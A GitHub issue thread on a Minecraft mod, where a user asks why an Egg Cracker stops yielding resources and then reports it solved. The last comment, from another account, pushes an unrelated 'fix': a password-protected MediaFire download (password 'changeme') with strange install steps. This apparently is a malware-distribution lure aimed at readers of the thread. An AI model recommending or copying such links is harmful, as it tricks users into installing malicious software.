### ISSUE TITLE
Egg Cracker not cracking eggs into resources???

### ISSUE THREAD

**Issue by SolarOnGH** [CreeperHost/Chickens#86]
Hi,

I'm trying to automate egg hatching coal chickens and cracking coal eggs for infinite coal.
The eggs from breeding pass through the cracker, uncracked eggs get item piped back into the system and re-cracked. However this is where my problem lies.

I've had the same egg pass through the cracker for about 15 mins and nothing. The automation is working fine, there is power from the provided thermoelectric generator. Even by hand feeding the system, I still got no resources. 

If I put a stack of > 3 eggs in the cracker, then i get resources at a resonable rate. however when the stack reaches 3 eggs then it stops cracking resources. 

I've tried this with different chicken eggs i still get the same problem. 

Im new to tech packs in MC, this is my first, but i dont think im doing anything wrong here?? 

Do the odds of cracking get rediculously low when the stack reaches < 3?

here is my system below

![2024-09-01_15 20 10](https://github.com/user-attachments/assets/240c7b49-facf-4c4f-9f28-9da05916167f)

FTB NEOTECH:  1.7.0
FTB APP VERSION : 1.25.18

**Comment by SolarOnGH** [comment]
I fixed the issue. I was under the assumption that eggs had to be re-cracked in order to get the resource.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
